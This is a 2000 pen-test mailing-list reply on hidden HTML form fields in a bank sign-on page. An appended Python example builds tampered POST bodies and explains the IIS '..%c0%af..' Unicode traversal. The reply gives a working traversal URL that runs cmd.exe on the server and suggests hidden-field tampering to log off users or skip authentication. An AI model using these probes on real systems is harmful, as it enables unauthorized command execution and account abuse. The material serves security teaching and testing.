Penetration Testing mailing list archives
Re: [PEN-TEST] HTML source code and authentication
From: Yonatan Bokovza <Yonatan () XPERT COM>
Date: Mon, 18 Dec 2000 22:12:04 +0200
-----Original Message-----
From: Skinner, Tim L. [mailto:tskinner () LARSONALLEN COM]
Sent: Monday, December 18, 2000 9:13 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: [PEN-TEST] HTML source code and authentication

Hi all, I must first apologize about my general ignorance of HTML, but I've been asked to look into this. I have a question regarding the source code of a web page that authenticates users. The snippet of source code from the web page in question is as follows:

#<H2><font color=9771824>Member Sign On</font></H2>
So far, so good :)
#<form name="signon" action="/scripts/ibank.dll" method=post>
First off, try accessing site/scripts/ and site/scripts/ibank.dll See if any interesting error messages are generated.
#<INPUT TYPE ="HIDDEN" NAME=Func VALUE="SignOn">
Hidden fields, as a general note, are begging for a tweak. Play around with the site, see what other types of "Func" values are there. Maybe you can disconnect other users with LogOff, or find a function that will let you "update your details" without authentication.
#<INPUT TYPE=HIDDEN NAME=Frames VALUE="150">
That's not obvious. Try increasing it to 1500, or reducing it to 5 and see what happens.
#<INPUT TYPE ="HIDDEN" NAME=homepath VALUE="cu3">
Hmmm, this could be interesting. "cu3" might be some directory on the server, or the directory you came from, or any other number of related paths. How about changing it to "/" or "..", or just "cu2" and see if the error message gives out more information.
It leaves me wondering if the referenced ibank.dll file is some authentication program of some sort
Very probably so. This dll is used to analyze the results of your POST command. It probably accesses a Username/Password of some sort and checks if your data matches anything.
and if the availability of this information simply by clicking on 'view source' is a potential problem.
Not as such. The dll will probably show up in the next URL, after you click SUBMIT, but the Hidden Fields are a Bad Thing (tm).
Furthermore, is there a way to obscure this information if it is risk?
Sure. Don't use Hidden Fields, make sure you've got the right access controls to the /scripts directory and the ibank.dll file.

Note we haven't mentioned IIS security. Try:
server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir

Well, that concludes our "Hacking in 45 seconds" lesson for today, come back tomorrow for "SSH Hijacking for dummies". :)

Best Regards,
Yonatan Bokovza
IT Security Consultant
yonatan () xpert com
Xpert Trusted Systems
PGP Fingerprint: 1A96 EE70 11BB 5241 BE42 0831 6819 BAAF B9AD EDDF
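The two techniques in the reply above, as an added example that is not part of the thread: first, parsing the quoted sign-on form and generating the hidden-field substitutions the reply suggests (the Func names other than SignOn are guesses, as the reply itself says; nothing is sent, the script only builds the POST bodies); second, why the ..%c0%af.. probe gets past a traversal check made on the undecoded path. %c0%af is an overlong two-byte UTF-8 encoding of '/', and the lenient_decode function below is a model of a decoder that accepts it, written for this example rather than taken from any server's code. The FORM_HTML text is reconstructed from the HTML quoted in the thread.

```python
"""Added example (not from the post): turn the sign-on form into tamper cases,
and show why the ..%c0%af.. probe slips past a check done on the undecoded path."""
import posixpath
from html.parser import HTMLParser
from urllib.parse import unquote, unquote_to_bytes, urlencode

# Constructed from the HTML quoted in the thread ('#' quote prefixes removed).
FORM_HTML = """
<H2><font color=9771824>Member Sign On</font></H2>
<form name="signon" action="/scripts/ibank.dll" method=post>
<INPUT TYPE ="HIDDEN" NAME=Func VALUE="SignOn">
<INPUT TYPE=HIDDEN NAME=Frames VALUE="150">
<INPUT TYPE ="HIDDEN" NAME=homepath VALUE="cu3">
</form>
"""


class HiddenFieldParser(HTMLParser):
    """Collects the form target and every hidden input, in document order."""

    def __init__(self):
        super().__init__()
        self.action = None
        self.method = "GET"
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        if tag == "form":
            self.action = a.get("action")
            self.method = (a.get("method") or "get").upper()
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden[a["name"]] = a.get("value", "")


def parse_form(html):
    """Return (action, method, {hidden field: value}) for the first form."""
    p = HiddenFieldParser()
    p.feed(html)
    return p.action, p.method, p.hidden


def baseline_body(hidden):
    """The POST body the browser would send unchanged."""
    return urlencode(hidden)


# Substitutions the reply suggests trying. Function names other than SignOn
# are guesses (assumption): the real set is whatever ibank.dll accepts.
TAMPER_VALUES = {
    "Func": ["LogOff", "UpdateDetails"],
    "Frames": ["1500", "5"],
    "homepath": ["/", "..", "cu2"],
}


def tamper_cases(hidden):
    """Return (field, value, urlencoded POST body) with one field changed per case."""
    cases = []
    for field, values in TAMPER_VALUES.items():
        if field not in hidden:
            continue
        for v in values:
            mutated = dict(hidden)
            mutated[field] = v
            cases.append((field, v, urlencode(mutated)))
    return cases


def lenient_decode(path):
    """Percent-decode, then decode UTF-8 without rejecting overlong 2-byte forms.
    Model (assumption) of a decoder that maps %c0%af to '/'; other bytes pass
    through as Latin-1."""
    raw = unquote_to_bytes(path)
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def strict_decode(path):
    """Standards-conforming decode: an overlong sequence is an error, so None."""
    try:
        return unquote(path, errors="strict")
    except UnicodeDecodeError:
        return None


def escapes_webroot(path, root="/scripts/"):
    """Does the path, as given, normalise to somewhere outside root?"""
    return not posixpath.normpath(path).startswith(root)


if __name__ == "__main__":
    action, method, hidden = parse_form(FORM_HTML)
    print(f"{method} {action} baseline: {baseline_body(hidden)}")
    for field, value, body in tamper_cases(hidden):
        print(f"  {field}={value!r}: {body}")
    probe = "/scripts/..%c0%af../winnt/system32/cmd.exe"
    print("check on raw path escapes root?", escapes_webroot(probe))
    decoded = lenient_decode(probe)
    print("after lenient decode:", decoded, escapes_webroot(decoded))
    print("strict decode:", strict_decode(probe))
```

The order of operations is the whole point of the second half: a check run on the raw string sees the component `..%c0%af..` and no `..` segment, so it passes; a decoder that then accepts the overlong form turns the same string into `/scripts/../../winnt/system32/cmd.exe`. Decoding first with a strict decoder, or normalising after decoding, closes it.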
Current thread:
- [PEN-TEST] HTML source code and authentication Skinner, Tim L. (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Bennett Todd (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication c0ncept (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication NetW3.COM Consulting (Dec 19)
- <Possible follow-ups>
- Re: [PEN-TEST] HTML source code and authentication Adams, Gavin (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Yonatan Bokovza (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Chris Tobkin (Dec 18)
- Re: [PEN-TEST] HTML source code and authentication Martijn Prummel (Dec 19)